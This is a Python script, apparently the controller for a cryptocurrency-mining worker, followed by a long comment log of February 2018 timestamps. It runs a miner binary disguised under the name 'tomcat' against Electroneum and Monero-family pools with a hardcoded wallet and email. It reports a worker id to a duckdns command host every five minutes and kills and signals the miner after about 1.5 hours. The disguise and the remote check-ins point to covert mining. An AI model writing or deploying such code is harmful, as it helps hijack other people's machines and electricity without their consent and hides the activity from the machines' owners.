import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:26:05.963379
#2018-02-17 17:14:05.288283
#2018-02-17 19:02:05.283908
#2018-02-17 20:50:07.991449
#2018-02-17 22:37:06.834505
#2018-02-18 00:21:04.884911
#2018-02-18 02:12:07.647900
#2018-02-18 03:59:06.056582
#2018-02-18 05:47:04.696837
#2018-02-18 07:39:06.808177
#2018-02-18 09:26:06.486168
#2018-02-18 11:12:03.680722
#2018-02-18 12:59:01.339615
#2018-02-18 14:46:05.896652
#2018-02-18 16:34:07.053454
#2018-02-18 18:23:06.304487
#2018-02-18 20:09:04.859882
#2018-02-18 21:56:03.463782
#2018-02-18 23:45:04.452925
#2018-02-19 01:31:06.300423
#2018-02-19 03:19:04.944079
#2018-02-19 05:04:05.372131
#2018-02-19 06:48:07.406404
#2018-02-19 08:38:01.540190
#2018-02-19 10:27:06.718238
#2018-02-19 12:15:04.810176
#2018-02-19 14:03:04.163450
#2018-02-19 15:51:09.792885
#2018-02-19 17:39:07.863624
#2018-02-19 19:28:02.168967
#2018-02-19 21:17:01.947945
#2018-02-19 23:03:04.406122
#2018-02-20 00:46:01.748592
#2018-02-20 02:36:07.798466
#2018-02-20 04:25:08.019701
#2018-02-20 06:09:01.905893
#2018-02-20 07:54:01.955857
#2018-02-20 09:39:03.748006
#2018-02-20 11:23:01.533053
#2018-02-20 13:08:01.667661
#2018-02-20 14:51:07.483267
#2018-02-20 16:37:05.975308
#2018-02-20 18:24:01.313020
#2018-02-20 20:16:06.445390
#2018-02-20 22:02:01.854890
#2018-02-20 23:43:04.761863
#2018-02-21 01:28:01.530135
#2018-02-21 03:15:09.227856
#2018-02-21 05:04:01.943548
#2018-02-21 06:51:03.476281
#2018-02-21 08:37:01.775931
#2018-02-21 10:22:05.663933
#2018-02-21 12:09:08.513500
#2018-02-21 13:57:08.965672
#2018-02-21 15:41:09.092154
#2018-02-21 17:32:04.857563
#2018-02-21 19:18:17.034586
#2018-02-21 21:06:03.683721
#2018-02-21 22:53:05.200307
#2018-02-22 00:42:01.922897
#2018-02-22 02:31:03.731228
#2018-02-22 04:17:04.930066
#2018-02-22 06:04:04.235260
#2018-02-22 07:50:01.523667
#2018-02-22 09:38:07.713438
#2018-02-22 11:22:08.749369
#2018-02-22 13:07:01.264113
#2018-02-22 14:54:06.493199
#2018-02-22 16:39:03.948423
#2018-02-22 18:25:07.756754
#2018-02-22 20:17:01.700986
#2018-02-22 22:03:06.384858
#2018-02-22 23:51:01.596017
#2018-02-23 01:38:05.620605
#2018-02-23 03:24:04.480328
#2018-02-23 05:12:04.331972
#2018-02-23 06:56:04.474066
#2018-02-23 08:44:07.674049
#2018-02-23 11:02:07.427200
#2018-02-23 12:58:05.567490
#2018-02-23 14:43:02.226736
#2018-02-23 16:33:06.079105
#2018-02-23 18:21:06.300636
#2018-02-23 20:05:09.069210
#2018-02-23 21:52:05.603245
#2018-02-23 23:43:01.612567
#2018-02-24 01:34:06.842285
#2018-02-24 03:23:06.590312
#2018-02-24 05:09:01.463285
#2018-02-24 06:58:04.879912
#2018-02-24 08:48:03.735382
#2018-02-24 10:51:07.179059
#2018-02-24 12:39:01.463907
#2018-02-24 14:28:03.420570
#2018-02-24 16:16:04.221982
#2018-02-24 18:09:02.180046
#2018-02-24 19:56:05.045967
#2018-02-24 21:40:04.979319
#2018-02-25 01:56:01.296251
#2018-02-25 05:46:04.146337
#2018-02-25 11:37:05.589907